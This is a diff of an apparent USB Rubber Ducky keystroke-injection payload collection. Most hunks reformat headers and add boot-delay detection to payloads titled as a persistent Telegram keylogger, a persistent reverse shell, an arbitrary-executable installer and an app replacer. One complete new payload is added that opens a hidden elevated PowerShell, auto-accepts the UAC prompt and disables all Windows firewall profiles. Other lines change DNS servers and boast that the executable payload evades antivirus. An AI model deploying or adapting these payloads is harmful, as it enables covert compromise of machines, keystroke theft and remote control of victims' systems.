STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
|
||||||
|
REM below is to blink the LED when payload done
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -1,12 +1,14 @@
|
||||||
REM ############################################################
|
REM_BLOCK
|
||||||
REM # #
|
############################################################
|
||||||
REM # Title : Defend yourself against AtlasVPN Bug-Door #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : Defend yourself against AtlasVPN Bug-Door #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : Execution #
|
# Version : 1.0 #
|
||||||
REM # Target : Linux #
|
# Category : Execution #
|
||||||
REM # #
|
# Target : Linux #
|
||||||
REM ############################################################
|
# #
|
||||||
|
############################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Administrator Permission
|
REM - Administrator Permission
|
||||||
|
@ -15,7 +17,34 @@ REM - AtlasVPN installed
|
||||||
REM Define the sudo user password
|
REM Define the sudo user password
|
||||||
DEFINE #SUDO-PWS example
|
DEFINE #SUDO-PWS example
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
|
@ -1,14 +1,14 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ################################################################
|
################################################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Edit The Default Real App With An Arbitrary |
|
# Title : Edit The Default Real App With An Arbitrary #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Execution |
|
# Category : Execution #
|
||||||
REM # Target : GNU/Linux (Debian based tested) |
|
# Target : GNU/Linux (Debian based tested) #
|
||||||
REM # |
|
# #
|
||||||
REM ################################################################
|
################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - sudo permissions
|
REM - sudo permissions
|
||||||
|
@ -16,11 +16,9 @@ REM - Internet connection
|
||||||
REM - Executable app
|
REM - Executable app
|
||||||
REM - '.desktop' file
|
REM - '.desktop' file
|
||||||
|
|
||||||
|
|
||||||
REM Note:
|
REM Note:
|
||||||
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
|
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
|
||||||
|
|
||||||
|
|
||||||
REM Set the link from wich will be downloaded the zip archive
|
REM Set the link from wich will be downloaded the zip archive
|
||||||
DEFINE ARBITRARY_APP_LINK example
|
DEFINE ARBITRARY_APP_LINK example
|
||||||
|
|
||||||
|
@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
|
||||||
REM sudo permissions needed
|
REM sudo permissions needed
|
||||||
DEFINE SUDO example
|
DEFINE SUDO example
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open a shell
|
REM Open a shell
|
||||||
DELAY 2000
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
|
|
|
@ -1,25 +1,50 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ################################################
|
################################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Exploiting An Executable File |
|
# Title : Exploiting An Executable File #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Execution |
|
# Category : Execution #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM ################################################
|
################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Nothing, it is Plug-And-Play but you can change it as you want.
|
REM - Nothing, it is Plug-And-Play but you can change it as you want.
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### Script ####
|
REM #### Script ####
|
||||||
|
|
||||||
|
|
||||||
STRINGLN
|
STRINGLN
|
||||||
function search_file {
|
function search_file {
|
||||||
for file in "$1"/*; do
|
for file in "$1"/*; do
|
||||||
|
|
|
@ -0,0 +1,23 @@
|
||||||
|
# Firewall Deactivator - Windows ✅
|
||||||
|
|
||||||
|
Deactivate firewall on windows
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to deactivate all firewalls on windows in a discrete manner.
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,61 @@
|
||||||
|
REM Title: Firewall deactivator
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Deactivate all firewalls in windows machine using hidden powershell
|
||||||
|
REM Target: Windows
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 200
|
||||||
|
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -108,18 +108,12 @@ Happy Hacking!
|
||||||
</a>
|
</a>
|
||||||
<br>Github
|
<br>Github
|
||||||
</td>
|
</td>
|
||||||
<td align="center" width="96">
|
|
||||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
|
||||||
</a>
|
|
||||||
<br>Instagram
|
|
||||||
</td>
|
|
||||||
<td align="center" width="96">
|
<td align="center" width="96">
|
||||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
</a>
|
</a>
|
||||||
<br>Discord
|
<br>Linkedin
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
</div>
|
</div>
|
|
@ -1,27 +1,67 @@
|
||||||
REM ###########################################################################################
|
REM_BLOCK
|
||||||
REM # |
|
###########################################################################################
|
||||||
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ###########################################################################################
|
# #
|
||||||
|
###########################################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Nothing
|
REM - Nothing
|
||||||
|
|
||||||
|
|
||||||
REM Define here your hexadecimal code
|
REM Define here your hexadecimal code
|
||||||
DEFINE #HEX_CODE example
|
DEFINE #HEX_CODE example
|
||||||
|
|
||||||
|
|
||||||
REM Note:
|
REM Note:
|
||||||
REM - Tested on Windows 11
|
REM - Tested on Windows 11
|
||||||
REM - Running checked but not blocked by Avast antivirus
|
REM - Running checked but not blocked by Avast antivirus
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRINGLN notepad.exe
|
STRINGLN notepad.exe
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ##################################################################
|
REM_BLOCK
|
||||||
REM # |
|
##################################################################
|
||||||
REM # Title : Make Windows performant (but ugly and boring) |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Make Windows performant (but ugly and boring) #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ##################################################################
|
# #
|
||||||
|
##################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Plug-And-Play <3
|
REM Plug-And-Play <3
|
||||||
|
|
||||||
|
@ -16,7 +18,48 @@ REM - Nothing
|
||||||
REM Note:
|
REM Note:
|
||||||
REM - Payload tested on Windows 11 Eng
|
REM - Payload tested on Windows 11 Eng
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ########################################################
|
REM_BLOCK
|
||||||
REM # #
|
########################################################
|
||||||
REM # Title : Persistent Keylogger - Telegram Based #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : Persistent Keylogger - Telegram Based #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : Execution #
|
# Version : 1.0 #
|
||||||
REM # Target : Linux #
|
# Category : Execution #
|
||||||
REM # #
|
# Target : Linux #
|
||||||
REM ########################################################
|
# #
|
||||||
|
########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
@ -14,7 +16,33 @@ REM - Internet Connection
|
||||||
REM Here you must put your own file link
|
REM Here you must put your own file link
|
||||||
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ############################################################
|
REM_BLOCK
|
||||||
REM # #
|
############################################################
|
||||||
REM # Title : Persistent Reverse Shell - Telegram Based #
|
# #
|
||||||
REM # Author : Aleff #
|
# Title : Persistent Reverse Shell - Telegram Based #
|
||||||
REM # Version : 1.0 #
|
# Author : Aleff #
|
||||||
REM # Category : Execution #
|
# Version : 1.0 #
|
||||||
REM # Target : Linux #
|
# Category : Execution #
|
||||||
REM # #
|
# Target : Linux #
|
||||||
REM ############################################################
|
# #
|
||||||
|
############################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
@ -14,7 +16,33 @@ REM - Internet Connection
|
||||||
REM Here you must put your own file link
|
REM Here you must put your own file link
|
||||||
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
|
@ -1,13 +1,14 @@
|
||||||
REM ########################################################
|
REM_BLOCK
|
||||||
REM # |
|
########################################################
|
||||||
REM # Title : Send Email Through Thunderbird |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Send Email Through Thunderbird #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 - Linux(debian tested) |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10/11 - Linux(debian tested) #
|
||||||
REM ########################################################
|
# #
|
||||||
|
########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
|
|
@ -1,22 +1,64 @@
|
||||||
REM ############################################################
|
REM_BLOCK
|
||||||
REM # |
|
############################################################
|
||||||
REM # Title : Send Messages In Discord Channel-Server |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Send Messages In Discord Channel-Server #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ############################################################
|
# #
|
||||||
|
############################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet connection
|
REM - Internet connection
|
||||||
REM - Discord Installed
|
REM - Discord Installed
|
||||||
|
|
||||||
|
|
||||||
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
|
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
|
||||||
DEFINE #CHAT_NAME example
|
DEFINE #CHAT_NAME example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Discord app
|
REM Open Discord app
|
||||||
GUI
|
GUI
|
||||||
|
|
|
@ -1,13 +1,14 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ####################################
|
####################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Set Arbitrary VPN |
|
# Title : Set Arbitrary VPN #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Execution |
|
# Category : Execution #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM ####################################
|
####################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Permissions
|
REM - Permissions
|
||||||
|
@ -15,44 +16,57 @@ REM - Internet Connection
|
||||||
REM - 'openvpn' installed
|
REM - 'openvpn' installed
|
||||||
|
|
||||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||||
DEFINE SUDO_PASS example
|
DEFINE #SUDO_PASS example
|
||||||
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
|
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
|
||||||
DEFINE VPN_FILE_LINK example.com
|
DEFINE #VPN_FILE_LINK example.com
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
